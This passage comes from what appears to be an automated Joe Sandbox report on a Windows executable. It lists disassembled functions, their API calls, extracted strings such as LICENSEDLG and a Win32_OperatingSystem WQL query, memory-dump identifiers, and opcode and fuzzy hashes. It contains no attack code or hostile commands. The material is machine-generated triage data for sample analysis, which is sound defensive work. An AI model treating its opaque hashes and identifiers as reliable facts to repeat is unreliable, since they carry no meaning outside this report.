                                                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                              • Instruction Fuzzy Hash: D631F8B1A147878FCB18DF68C8511AEBBE0FB95304F10452DE495C7342C739EA0ACB91
                                                                                              Function 00CAE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CAE30E
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CE1030,00000200,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                                                              • _strlen.LIBCMT ref: 00CAE32F
                                                                                              • SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                                              • GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CAE475
                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAE4A2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CAE4DB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00CAE4E3
                                                                                              • GetWindow.USER32(?,00000005), ref: 00CAE4EE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00CAE51B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00CAE58D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: a5b9531d8051ae7e738756b24d3b349f1bd7defe127d2838775cb79fa1d83aa3
                                                                                              • Instruction ID: b89b47cfe023fbc73f0a41d79cc8010ec880ec05f004e5763ad9487374541c28
                                                                                              • Opcode Fuzzy Hash: a5b9531d8051ae7e738756b24d3b349f1bd7defe127d2838775cb79fa1d83aa3
                                                                                              • Instruction Fuzzy Hash: 6481B171608301AFD710DFA8CC89B6FBBEDEB89708F04091DFA99D7250D630E9058B62
                                                                                              Function 00CCCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00CCCB66
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC71E
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC730
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC742
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC754
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC766
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC778
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC78A
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC79C
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7AE
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7C0
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7D2
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7E4
                                                                                                • Part of subcall function 00CCC701: _free.LIBCMT ref: 00CCC7F6
                                                                                              • _free.LIBCMT ref: 00CCCB5B
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCCB7D
                                                                                              • _free.LIBCMT ref: 00CCCB92
                                                                                              • _free.LIBCMT ref: 00CCCB9D
                                                                                              • _free.LIBCMT ref: 00CCCBBF
                                                                                              • _free.LIBCMT ref: 00CCCBD2
                                                                                              • _free.LIBCMT ref: 00CCCBE0
                                                                                              • _free.LIBCMT ref: 00CCCBEB
                                                                                              • _free.LIBCMT ref: 00CCCC23
                                                                                              • _free.LIBCMT ref: 00CCCC2A
                                                                                              • _free.LIBCMT ref: 00CCCC47
                                                                                              • _free.LIBCMT ref: 00CCCC5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                                                              • Instruction ID: 48e647183da0de5e250c5088b080d114106660cd6457ff1e8b131a0b4b604379
                                                                                              • Opcode Fuzzy Hash: beaba5b339a57080864fca00f973c601def26575867b387696890440471f797e
                                                                                              • Instruction Fuzzy Hash: BE314B31A002069FEB20AA78E886F5BB7E9EF10310F15442DE16ED7192DF35EE84DB10
                                                                                              Function 00CB9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CB9736
                                                                                              • _wcslen.LIBCMT ref: 00CB97D6
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00CB97E5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB9806
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CB982D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1777411235-4209811716
                                                                                              • Opcode ID: c7559008b3c3909b3f198ac6f850e4b77d054a6cbccc9a38fd76fe449e5c0d53
                                                                                              • Instruction ID: a28f578e5675c39ceb7d5488974b5645ba3ff03902a1f3438fa2dcc44a03846c
                                                                                              • Opcode Fuzzy Hash: c7559008b3c3909b3f198ac6f850e4b77d054a6cbccc9a38fd76fe449e5c0d53
                                                                                              • Instruction Fuzzy Hash: DB3116325083517BE725AB34EC46FAF77A8EF42710F14011EF611A61D2EB75DA0983A6
                                                                                              Function 00CBD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00CBD6C1
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBD6ED
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBD709
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBD720
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBD734
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBD75D
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBD764
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00CBD76D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 2e496fc1e30a7fb3e43f515eed9a260cc8f5f15671c944df68c75dfa57177e77
                                                                                              • Instruction ID: 606b8b88733225238a6820774c6864955b409cfde792a0abe606fb0f06b862c2
                                                                                              • Opcode Fuzzy Hash: 2e496fc1e30a7fb3e43f515eed9a260cc8f5f15671c944df68c75dfa57177e77
                                                                                              • Instruction Fuzzy Hash: 8C1133721017107BE220ABB19C4AFEF7A5CAF04741F004121FA66F2295EA65CF4596B6
                                                                                              Function 00CC96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC9705
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CC9711
                                                                                              • _free.LIBCMT ref: 00CC971C
                                                                                              • _free.LIBCMT ref: 00CC9727
                                                                                              • _free.LIBCMT ref: 00CC9732
                                                                                              • _free.LIBCMT ref: 00CC973D
                                                                                              • _free.LIBCMT ref: 00CC9748
                                                                                              • _free.LIBCMT ref: 00CC9753
                                                                                              • _free.LIBCMT ref: 00CC975E
                                                                                              • _free.LIBCMT ref: 00CC976C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 7802ade1b8a58d3a804f47cd11dd8dc2f426162915d319f4875dd491838f2a73
                                                                                              • Instruction ID: b537e8ecdc8c0aeea7b4c7c3ad2c72125d209ac10bc9047156b95683e9549fa1
                                                                                              • Opcode Fuzzy Hash: 7802ade1b8a58d3a804f47cd11dd8dc2f426162915d319f4875dd491838f2a73
                                                                                              • Instruction Fuzzy Hash: 1311E97550000ABFCB01EF58D842EDE3B75EF14350B0255A9FA094F262DE31DE54AB84
                                                                                              Function 00CC2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: b269b07b0b9f83ff0f23c6774274d2bb477364fc56ba8fdaf906b8dede01b7b8
                                                                                              • Instruction ID: f3fc51cf77106af9f54d67e1f8d4b6f5e7511b38bd408f6cedea0374400605cc
                                                                                              • Opcode Fuzzy Hash: b269b07b0b9f83ff0f23c6774274d2bb477364fc56ba8fdaf906b8dede01b7b8
                                                                                              • Instruction Fuzzy Hash: 02B14771900259EFCF25DFA4D881EAEBBB5BF04310B18815EE8216B212D735DB52DB91
                                                                                              Function 00CA6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3122303884-3508440684
                                                                                              • Opcode ID: d68b12332e81a1e0ace70b20a5b121ea96fbfaa552a3417a470066191d40dcac
                                                                                              • Instruction ID: 54c78cfd6adf09313937312dc59917ec6db82e466a07aa1b5c896e45091636a5
                                                                                              • Opcode Fuzzy Hash: d68b12332e81a1e0ace70b20a5b121ea96fbfaa552a3417a470066191d40dcac
                                                                                              • Instruction Fuzzy Hash: F1411BB1D08386BAEF20E7709D86FEE77ACAF06308F040555FA55A6182D774AB44D721
                                                                                              Function 00CBB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBB610
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBB637
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBB650
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CBB661
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBB66A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBB67E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBB694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: 97c08238208e7ceaf365944054beb1a54ca5493b8eacdbcecddde23a6ede8c8f
                                                                                              • Instruction ID: 9f42a3025d8853399240b4c507746578bc9c7fe36b2c9f82718b8789d78dd005
                                                                                              • Opcode Fuzzy Hash: 97c08238208e7ceaf365944054beb1a54ca5493b8eacdbcecddde23a6ede8c8f
                                                                                              • Instruction Fuzzy Hash: C721C732204319BBD6255F66ED4AFBF3B7DEB4AB41F010018F609D65E0CBA29E01D636
                                                                                              Function 00CBFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4AECFFE7,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFD99
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE14
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CBFE1F
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE48
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE52
                                                                                              • GetLastError.KERNEL32(80070057,4AECFFE7,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE57
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE6A
                                                                                              • GetLastError.KERNEL32(00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE80
                                                                                              • _com_issue_error.COMSUPP ref: 00CBFE93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 826534a9a07131a119aa377017d722a9f7928e87329bb1f3072a16c42d6e92aa
                                                                                              • Instruction ID: 248ffa0f0dc1f2b8868cd22553d3eea75672cdadac8801c323067c937d2605c6
                                                                                              • Opcode Fuzzy Hash: 826534a9a07131a119aa377017d722a9f7928e87329bb1f3072a16c42d6e92aa
                                                                                              • Instruction Fuzzy Hash: 804108B1A00259ABDB109F68DC45BEEBBA8EB48710F10823EF915E7351D735DA01C7A5
                                                                                              Function 00CAAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                                                              • Instruction ID: df8f749fbd8e0102be24f105cd5b739c2f64c2696e1fce1b5be3d2ebaa5d8d32
                                                                                              • Opcode Fuzzy Hash: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                                                              • Instruction Fuzzy Hash: A47170B0A0021AAFDF14DFA4CC95AAFB7B9FF49314B14015EE512A72A1CB306E41DB61
                                                                                              Function 00CA9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA9387
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA93AA
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CA93C9
                                                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                                                              • _swprintf.LIBCMT ref: 00CA9465
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA94D4
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA9514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: 707cd57fc7ec4aeb967a3f0e427f381b9eac8cd0bee9dba9805f05c654ab9107
                                                                                              • Instruction ID: d8593ec027ba409c95f1c52e12ec5d9180e2ba150b24593d0823f86fa1f9e90f
                                                                                              • Opcode Fuzzy Hash: 707cd57fc7ec4aeb967a3f0e427f381b9eac8cd0bee9dba9805f05c654ab9107
                                                                                              • Instruction Fuzzy Hash: 614198B1D0025A66CF21EBA0CC46EDF737CEF46344F0049A5B619E3051EB389B89EB60
                                                                                              Function 00CB1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00CB122E
                                                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
